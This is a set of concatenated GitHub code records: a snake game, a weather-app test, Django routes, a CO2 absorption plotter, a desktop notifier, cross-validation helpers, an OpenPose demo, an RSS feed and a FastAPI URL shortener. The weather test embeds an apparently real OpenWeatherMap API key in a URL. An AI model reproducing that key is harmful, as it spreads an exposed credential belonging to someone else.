snake = Sanke(\"\", 10, width, height)\n \n initSite()\n snake.initSnake()\n\n # 每0.5秒更新蛇爬行 \n scheduler = BackgroundScheduler()\n scheduler.add_job(snake.wriggle, 'interval', seconds=0.5)\n scheduler.start()\n\n # 实例化键盘\n kb=Controller()\n kb.release(\"a\")\n # 开始监听,按esc退出监听\n start_listen(snake)\n \n \n\n \n \n\n\nif __name__ == \"__main__\":\n run()", "repo_name": "xiaoyaos/GluttonousSnake", "sub_path": "snake.py", "file_name": "snake.py", "file_ext": "py", "file_size_in_byte": 6403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "random.randint", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 111, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 112, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 139, "usage_type": "call"}, {"api_name": "os.system", "line_number": 148, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.up", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 161, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.down", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 165, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.left", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 169, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.right", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 173, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.esc", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 177, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 199, 
"usage_type": "call"}, {"api_name": "apscheduler.schedulers.background.BackgroundScheduler", "line_number": 211, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "7258699377", "text": "import pytest\r\nfrom unittest.mock import patch\r\n\r\n\r\nfrom project import make_url, get_weather, display_forecast_choice\r\n\r\ndef test_make_url(requests_mock):\r\n city = \"New York\"\r\n expected_query = \"http://api.openweathermap.org/data/2.5/forecast?q=New+York&units=metric&appid=4a667b3caefe6915603d5d48f02b50d7\"\r\n requests_mock.get(expected_query, json={})\r\n assert make_url(city) == expected_query\r\n\r\ndef test_get_weather(requests_mock):\r\n city = \"New York\"\r\n expected_response = {}\r\n query_url = make_url(city)\r\n requests_mock.get(query_url, json=expected_response)\r\n assert get_weather(query_url) == expected_response\r\n\r\n@patch('builtins.input', side_effect=['today'])\r\n@patch('sys.exit')\r\ndef test_display_forecast_choice_exit_on_invalid_input(mock_exit, mock_input):\r\n weather_data = {\r\n \"list\": [],\r\n \"city\": {\"name\": \"New York\"}\r\n }\r\n display_forecast_choice(weather_data)\r\n assert mock_exit.called_with(\"Invalid choice. Please enter 'today' or 'tomorrow'.\")\r\n\r\nif __name__ == \"__main__\":\r\n pytest.main()\r\n", "repo_name": "alexbalash/cs50-final-project", "sub_path": "test_project.py", "file_name": "test_project.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "project.make_url", "line_number": 11, "usage_type": "call"}, {"api_name": "project.make_url", "line_number": 16, "usage_type": "call"}, {"api_name": "project.get_weather", "line_number": 18, "usage_type": "call"}, {"api_name": "project.display_forecast_choice", "line_number": 27, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 20, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.main", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "24956018462", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'frontend'\nurlpatterns = [\n # path('snails/activity/', views.create_new_activity, name='activity'),\n path('snails/activity/detail/', views.activity_detail, name='activity-detail'),\n path('snails/activity/detail///', views.activity_detail_by_date,\n name='activity-by-date'),\n path('snails/activity/detail/', views.activity_detail_by_pen, name='activity-detail-by-pen'),\n path('snails/activity/summary/', views.activity_summary, name='activity-summary'),\n path('snails/inventory/detail/', views.inventory_detail, name='inventory-detail'),\n path('snails/inventory/detail/', views.inventory_detail_by_pen, name='inventory-detail-by-pen'),\n path('snails/inventory/snapshot/', views.inventory_snapshot, name='inventory-snapshot'),\n path('snails/inventory/snapshot/', views.inventory_snapshot_by_staff, name='inventory-snapshot-staff'),\n path('snails/inventory/snapshot/all', views.inventory_snapshot_all, name='inventory-snapshot-all'),\n path('snails/inventory/specie/', views.inventory_by_specie, name='inventory-specie'),\n path('eggs/inventory/activities', views.eggs_inventory_activities, name='eggs-inventory-activities'),\n path('eggs/inventory/activities/', views.eggs_inventory_by_pen, name='eggs-inventory-by-pen'),\n path('eggs/inventory/snapshot', views.eggs_inventory_snapshot, name='eggs-inventory-snapshot'),\n path('pens/view/', views.pen_data, name='pens'),\n path('graphs/', views.activity_graph, name='graphs')\n]\n# /inventory\n", "repo_name": "waleadekoya/MaidstoneFarmSite", "sub_path": "front_end/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "10581855446", "text": "import numpy\nimport random\nimport pylab\nfrom hapi import *\nimport pandas as pd\nfrom pylab import GridSpec\nfrom matplotlib.widgets import Slider\nfrom pathlib import Path\nimport os\n\ndb_begin('data')\nfetch_by_ids('CO2', [7, 8, 9, 10], 3589.1, 3590.199)\n\ndef first_y(T, P , x, cons):\n '''Отображаемая фукнция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Lorentz(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\ndef second_y(T, P , x, cons):\n '''Отображаемая фукнция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Doppler(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\n\ndef third_y(T, P , x, cons):\n '''Отображаемая фу��нция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Voigt(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\n\nif __name__ == '__main__':\n def slava_merlow():\n\n SRC = Path(os.getcwd()+'/Documents/Github/Dushnila/CO2 absorption coefficient, cm-1.csv')\n #SRC = (Path(os.getcwd()) / 'CO2 absorption coefficient, cm-1.csv')\n return pd.read_csv(SRC, delimiter=';').replace(to_replace=',', value = '.', regex = True).astype('float')\n\n def updateGraph():\n '''!!! Функция для обновления графика'''\n # Будем использовать sigma и mu, установленные с помощью слайдеров\n global slider_T\n global slider_P\n global slider_cons\n global graph_1\n global graph_2\n global graph_3\n global graph_4\n global grid_visible\n global data\n data = slava_merlow()\n\n\n # Используем атрибут val, чтобы получить значение слайдеров\n T = slider_T.val\n P = slider_P.val\n cons = slider_cons.val\n x = absorptionCoefficient_Lorentz(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', HITRAN_units = True)[0]\n #y = first_y(T, P, x , cons)\n\n\n graph_1.clear()\n graph_1.grid()\n graph_1.plot(x, first_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Lorentz'])\n graph_1.legend(['Lorentz', 'Slava'])\n\n graph_2.clear()\n graph_2.grid()\n graph_2.plot(x, second_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Doppler'])\n graph_2.legend(['Doppler', 'Slava'])\n\n graph_3.clear()\n graph_3.grid()\n graph_3.plot(x, third_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Voigt'])\n graph_3.legend(['Voigt', 'Slava'])\n\n graph_4.clear()\n graph_4.grid()\n graph_4.plot(x, third_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Voigt'])\n graph_4.legend(['Voigt', 'Slava'])\n\n pylab.draw()\n\n def onChangeValue(value):\n '''!!! 
Обработчик события изменения значений слайдеров'''\n updateGraph()\n\n#YFXFKJ KZNCRJQ GHJUHFVVS\n # Создадим окно с графиком\n\n graph_1 = pylab.subplot2grid((3,2),(0,0))\n graph_2 = pylab.subplot2grid((3,2),(0,1))\n graph_3 = pylab.subplot2grid((3,2),(1,0))\n graph_4 = pylab.subplot2grid((3,2),(1,1))\n\n graph_1.grid()\n graph_2.grid()\n graph_3.grid()\n graph_4.grid()\n\n\n # Создание слайдера для задания T\n axes_slider_T = pylab.axes([0.05, 0.25, 0.85, 0.04])\n slider_T = Slider(axes_slider_T,\n label='T',\n valmin=250,\n valmax=500,\n valinit=296,\n valfmt='%1.2f')\n\n # !!! Подпишемся на событие при изменении значения слайдера.\n slider_T.on_changed(onChangeValue)\n\n # Создание слайдера для задания P\n axes_slider_P = pylab.axes([0.05, 0.17, 0.85, 0.04])\n slider_P = Slider(axes_slider_P,\n label='P',\n valmin=0.001,\n valmax=2,\n valinit=0.01,\n valfmt='%1.4f')\n\n # !!! Подпишемся на событие при изменении значения слайдера.\n slider_P.on_changed(onChangeValue)\n\n# Создание слайдера для задания cons\n axes_slider_cons = pylab.axes([0.05, 0.09, 0.85, 0.04])\n slider_cons = Slider(axes_slider_cons,\n label='cs',\n valmin=0,\n valmax=0.5,\n valinit=0.02,\n valfmt='%1.5f')\n\n# !!! Подпишемся на событие при изменении значения слайдера.\n slider_cons.on_changed(onChangeValue)\n\n\n\n updateGraph()\n\n pylab.show()", "repo_name": "Amba-AlexsmeT/Dushnila", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5360, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 45, "usage_type": "call"}, {"api_name": "pylab.draw", "line_number": 90, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 99, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 100, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 101, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 102, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 112, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 124, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.widgets.Slider", "line_number": 136, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 150, "usage_type": "call"}]}
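All three profile functions in this record apply the same Beer–Lambert step: the absorbed fraction is 1 - exp(-k·n·L), with k the per-molecule absorption coefficient returned by HAPI (HITRAN_units=True), n the absorber number density, and L = 47 cm the path length. The script hardcodes 0.01 atm as 10132.5 dyn/cm²; the sketch below generalizes that step in CGS units:

import numpy as np

def absorbed_fraction(k, pressure_atm, temperature_k, mole_fraction, path_cm):
    # Ideal-gas number density in CGS: 1 atm = 1.01325e6 dyn/cm^2, k_B = 1.380649e-16 erg/K.
    n = mole_fraction * pressure_atm * 1.01325e6 / (1.380649e-16 * temperature_k)
    return 1.0 - np.exp(-np.asarray(k) * n * path_cm)

print(absorbed_fraction(k=1e-20, pressure_atm=0.01, temperature_k=296,
                        mole_fraction=0.02, path_cm=47))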
+{"seq_id": "40223699893", "text": "import time\r\nfrom plyer import notification\r\n\r\nnotification_title = 'Hello'\r\nnotification_message = 'Drink Some Water. Have a Nice Day.'\r\n\r\nnotification.notify(\r\n title = notification_title,\r\n message = notification_message,\r\n app_icon = r\"C:/Users/Yashraj/OneDrive/Documents/SYNC/python.ico\",\r\n timeout = 10,\r\n toast = False\r\n )", "repo_name": "yashrajmodani/DesktopNotifier", "sub_path": "task1.py", "file_name": "task1.py", "file_ext": "py", "file_size_in_byte": 347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "plyer.notification.notify", "line_number": 7, "usage_type": "call"}, {"api_name": "plyer.notification", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "29702660489", "text": "from joblib import Parallel, delayed\nfrom sklearn.metrics._scorer import get_scorer\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.base import clone\nfrom sklearn.utils.multiclass import type_of_target\n\n\ndef cross_val_fit(estimator, X, y, cv, metric, n_jobs=-1):\n \"\"\"Generate cross-validated estimators for all folds\n\n Args:\n estimator: estimator object implementing 'fit' and 'predict'\n X (array like): (n_samples, n_features)\n y (array like): (n_samples,)\n cv (int, cross-validation generator ): number of folds. You can also pass a predefined CV splitter\n metric (str): metric to return for each fold\n n_jobs (int): Number of jobs to run in parallel\n \n Returns:\n (list): A list of dictionaries containing 'score', 'scorer', and 'estimator'\n score: Calculated metric\n scorer: The scorer function used for calculating the metric\n estimator: Fitted estimator\n \"\"\"\n scorer = get_scorer(metric)\n \n cv = _check_cv(y, cv)\n splits = list(cv.split(X, y))\n parallel = Parallel(n_jobs=n_jobs)\n results = parallel(\n delayed(_fit_estimator)(clone(estimator), X, y, train_index, test_index, scorer)\n for train_index, test_index in splits)\n return results\n\n\ndef _fit_estimator(estimator, X, y, train_index, test_index, scorer):\n \"\"\"Helper function for fiting the estimator to the training data\n and returning the evaluated metric along with the scorer used for the metric\n \"\"\"\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n estimator.fit(X_train, y_train)\n y_pred = estimator.predict(X_test)\n predict_proba = getattr(estimator, \"predict_proba\", None)\n y_prob = None\n if callable(predict_proba):\n y_prob = predict_proba(X_test)\n return {'score': scorer(estimator, X_test, y_test),\n 'estimator': estimator,\n 'scorer': scorer,\n 'y_pred': y_pred,\n 'y_prob': y_prob,\n 'test_index': test_index}\n\ndef _check_cv(y, cv):\n \"\"\"\"Helper function to determine the CV type\"\"\"\n classification_target_types = ('binary', 'multiclass')\n if hasattr(cv, 'split'):\n return cv\n if type_of_target(y) in classification_target_types:\n return StratifiedKFold(n_splits=cv)\n else:\n return KFold(n_splits=cv)", "repo_name": "kkarbasi/ML_toolkit", "sub_path": "cv_tools/cv_utils_save.py", "file_name": "cv_utils_save.py", "file_ext": "py", "file_size_in_byte": 2417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sklearn.metrics._scorer.get_scorer", "line_number": 25, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 29, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.utils.multiclass.type_of_target", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "38359933307", "text": "import sys\nimport time\nimport cv2\n\ntry:\n sys.path.append('/usr/local/python')\n from openpose import pyopenpose as op\nexcept ImportError as e:\n print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` '\n 'in CMake and have this Python script in the right folder?')\n raise e\n\n# Custom Params (refer to include/openpose/flags.hpp for more parameters)\nparams = dict()\nparams[\"model_folder\"] = \"/home/louisme/library/openpose/models\"\n\n\nif __name__ == '__main__' :\n # Starting OpenPose\n opWrapper = op.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Process Image\n datum = op.Datum()\n cap = cv2.VideoCapture('/home/louisme/PycharmProjects/takePicture/video.mp4')\n while True:\n start = time.time()\n ret, imageToProcess = cap.read()\n if not ret:\n break\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop([datum])\n\n # Display Image\n end = time.time()\n # print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n output = datum.cvOutputData\n cv2.putText(output, str(1/(end-start)), (20,20), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.imshow(\"frame\", output)\n q = cv2.waitKey(1)\n if q == ord('q'):\n break", "repo_name": "ambersun1234/AART", "sub_path": "AART_project/backupFile/openpose example.py", "file_name": "openpose example.py", "file_ext": "py", "file_size_in_byte": 1323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "openpose.pyopenpose.WrapperPython", "line_number": 20, "usage_type": "call"}, {"api_name": "openpose.pyopenpose", "line_number": 20, "usage_type": "name"}, {"api_name": "openpose.pyopenpose.Datum", "line_number": 25, "usage_type": "call"}, {"api_name": "openpose.pyopenpose", "line_number": 25, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "30364548436", "text": "import datetime\nimport logging\n\nfrom google.appengine.ext import webapp\n\nfrom vendor import PyRSS2Gen\n\nfrom models.post import Post\n\n\nclass FeedHandler(webapp.RequestHandler):\n def get(self):\n\n rss_items = []\n\n # fetch all posts from the db\n logging.info(\"FeedHandler::get() - Fetching posts from the db\")\n q = Post.all()\n q.order(\"-created_at\")\n results = q.fetch(20)\n\n for p in results:\n rss_items.append(\n PyRSS2Gen.RSSItem(\n title = \"Tasty Burger Friday\",\n link = \"http://www.tasty-babelsberg.de\",\n description = p.content,\n # guid = PyRSS2Gen.Guid('Guid{0}'.format(p.key().id())),\n pubDate = p.created_at\n )\n )\n\n logging.info(\"Building the RSS\")\n\n # build the rss\n rss = PyRSS2Gen.RSS2(\n title = \"Tasty Burger Feed\",\n link = \"http://www.tasty-babelsberg.de\",\n description = \"Tasty Burger Friday\",\n lastBuildDate = datetime.datetime.now(),\n\n items = rss_items\n )\n\n self.response.headers['Content-Type'] = 'application/rss+xml'\n self.response.out.write(rss.to_xml())\n", "repo_name": "polym0rph/TastyBurger", "sub_path": "feed.py", "file_name": "feed.py", "file_ext": "py", "file_size_in_byte": 1266, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "google.appengine.ext.webapp.RequestHandler", "line_number": 11, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.webapp", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "models.post.Post.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.post.Post", "line_number": 18, "usage_type": "name"}, {"api_name": "vendor.PyRSS2Gen.RSSItem", "line_number": 24, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen", "line_number": 24, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen.RSS2", "line_number": 36, "usage_type": "call"}, {"api_name": "vendor.PyRSS2Gen", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "13917076220", "text": "import asyncio\nimport datetime\n\nimport qrcode\nimport requests\nfrom fastapi import APIRouter, Depends\nfrom fastapi.responses import FileResponse, JSONResponse, RedirectResponse\nfrom starlette.requests import Request\nfrom starlette.responses import Response\n\nimport app.api.analytics.dao as AnalyticsDAO\nimport app.api.shortie.dao as ShortieDAO\nfrom app.api.analytics.models import Analytics\nfrom app.api.auth.funcs import is_authorized, should_throttle\nfrom app.api.shortie.funcs import base62encode, make_short_url\nfrom app.api.shortie.models import ShortenedURL\nfrom app.api.shortie.schemas import (\n DeleteResponse,\n LongUrl,\n ShortenReponse,\n ShortUrlId,\n UpdateResponse,\n)\nfrom app.api.users.models import User\nfrom app.cache.conn import RedisClientManager\nfrom app.core.config import get_settings\n\nsettings = get_settings()\n\nrouter = APIRouter()\n\n\n@router.get(\"/{short_url_id}\", response_class=RedirectResponse)\nasync def read(short_url_id: str, request: Request, response: Response):\n now = datetime.datetime.now()\n\n shortened_url, short_url_analytics = (\n await ShortieDAO.find_by_short_url_id_or_alias(short_url_id),\n await AnalyticsDAO.find_by_short_url_id_or_alias(short_url_id),\n )\n\n short_url_analytics.clicks += 1\n short_url_analytics.last_visited = now\n\n await short_url_analytics.save()\n\n long_url = shortened_url.long_url\n\n if not (long_url.startswith(\"https://\") or long_url.startswith(\"http://\")):\n try:\n schemes = [\"https://\", \"http://\"]\n for scheme in schemes:\n r = requests.head(scheme + long_url)\n if r.status_code < 400:\n return RedirectResponse(scheme + long_url)\n except requests.exceptions.RequestException:\n pass\n\n return RedirectResponse(long_url)\n\n\n@router.post(\"\")\nasync def create(\n body: LongUrl,\n request: Request,\n user: User | None = Depends(should_throttle),\n):\n with RedisClientManager() as cache:\n counter = cache.incr(settings.COUNTER_CACHE_KEY)\n short_url_id = base62encode(counter - 1)\n short_url = make_short_url(short_url_id)\n alias, long_url = body.alias, body.long_url\n if user:\n user_pk = user.pk\n else:\n user_pk = None\n if request.client:\n user_pk = request.client.host\n\n if alias and await ShortieDAO.alias_already_exists(alias):\n return JSONResponse(\n status_code=200,\n content={\"error\": f\"alias {alias} is already taken.\"},\n )\n\n shortened_url, shortened_url_analytics = (\n ShortenedURL(\n short_url_id=short_url_id,\n alias=alias,\n short_url=short_url,\n long_url=long_url,\n owner=user_pk,\n ),\n Analytics(\n short_url_id=short_url_id,\n alias=alias,\n owner=user_pk,\n ),\n )\n\n ttl = settings.CACHE_TTL\n asyncio.gather(\n shortened_url.save(),\n shortened_url.expire(ttl),\n shortened_url_analytics.save(),\n shortened_url_analytics.expire(ttl),\n )\n\n return ShortenReponse(\n short_url_id=short_url_id,\n alias=alias,\n short_url=short_url,\n long_url=long_url,\n )\n\n\n@router.put(\"/{short_url_id}\", dependencies=[Depends(is_authorized)])\nasync def udpate(short_url_id: str, body: LongUrl):\n shortened_url = await ShortieDAO.find_by_short_url_id(short_url_id)\n\n previous_long_url, new_long_url = shortened_url.long_url, body.long_url\n short_url = shortened_url.short_url\n shortened_url.long_url = new_long_url\n\n await shortened_url.save()\n\n return UpdateResponse(\n short_url_id=short_url_id,\n short_url=short_url,\n previous_long_url=previous_long_url,\n new_long_url=new_long_url,\n )\n\n\n@router.delete(\"/{short_url_id}\", 
dependencies=[Depends(is_authorized)])\nasync def delete(short_url_id: str):\n shortened_url = await ShortieDAO.find_by_short_url_id(short_url_id)\n\n await shortened_url.delete(shortened_url.pk)\n\n return DeleteResponse(\n short_url_id=short_url_id,\n short_url=shortened_url.short_url,\n long_url=shortened_url.long_url,\n )\n\n\n@router.post(\"/qr\", response_class=FileResponse)\nasync def qr(body: ShortUrlId):\n short_url = await ShortieDAO.find_by_short_url_id_or_alias(\n body.short_url_id\n )\n\n # TODO: change to deployed host/short_url_id\n img = qrcode.make(short_url.long_url)\n\n filename = f\"/tmp/{body.short_url_id}.png\"\n\n img.save(filename)\n\n return FileResponse(filename)\n", "repo_name": "RafaelBroseghini/shortie", "sub_path": "app/api/shortie/endpoints.py", "file_name": "endpoints.py", "file_ext": "py", "file_size_in_byte": 4743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "app.core.config.get_settings", "line_number": 28, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 30, "usage_type": "call"}, {"api_name": "starlette.requests.Request", "line_number": 34, "usage_type": "name"}, {"api_name": "starlette.responses.Response", "line_number": 34, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id_or_alias", "line_number": 38, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 38, "usage_type": "name"}, {"api_name": "app.api.analytics.dao.find_by_short_url_id_or_alias", "line_number": 39, "usage_type": "call"}, {"api_name": "app.api.analytics.dao", "line_number": 39, "usage_type": "name"}, {"api_name": "requests.head", "line_number": 53, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 56, "usage_type": "attribute"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 33, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.LongUrl", "line_number": 64, "usage_type": "name"}, {"api_name": "starlette.requests.Request", "line_number": 65, "usage_type": "name"}, {"api_name": "app.api.users.models.User", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 66, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.should_throttle", "line_number": 66, "usage_type": "argument"}, {"api_name": "app.cache.conn.RedisClientManager", "line_number": 68, "usage_type": "call"}, {"api_name": "app.api.shortie.funcs.base62encode", "line_number": 70, "usage_type": "call"}, {"api_name": "app.api.shortie.funcs.make_short_url", "line_number": 71, "usage_type": "call"}, {"api_name": "app.api.shortie.dao.alias_already_exists", "line_number": 80, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 80, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "app.api.shortie.models.ShortenedURL", "line_number": 87, "usage_type": "call"}, {"api_name": "app.api.analytics.models.Analytics", "line_number": 94, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 102, "usage_type": "call"}, {"api_name": 
"app.api.shortie.schemas.ShortenReponse", "line_number": 109, "usage_type": "call"}, {"api_name": "app.api.shortie.schemas.LongUrl", "line_number": 118, "usage_type": "name"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id", "line_number": 119, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 119, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.UpdateResponse", "line_number": 127, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 117, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.is_authorized", "line_number": 117, "usage_type": "argument"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id", "line_number": 137, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 137, "usage_type": "name"}, {"api_name": "app.api.shortie.schemas.DeleteResponse", "line_number": 141, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 135, "usage_type": "call"}, {"api_name": "app.api.auth.funcs.is_authorized", "line_number": 135, "usage_type": "argument"}, {"api_name": "app.api.shortie.schemas.ShortUrlId", "line_number": 149, "usage_type": "name"}, {"api_name": "app.api.shortie.dao.find_by_short_url_id_or_alias", "line_number": 150, "usage_type": "call"}, {"api_name": "app.api.shortie.dao", "line_number": 150, "usage_type": "name"}, {"api_name": "qrcode.make", "line_number": 155, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 161, "usage_type": "call"}, {"api_name": "fastapi.responses.FileResponse", "line_number": 148, "usage_type": "name"}]}
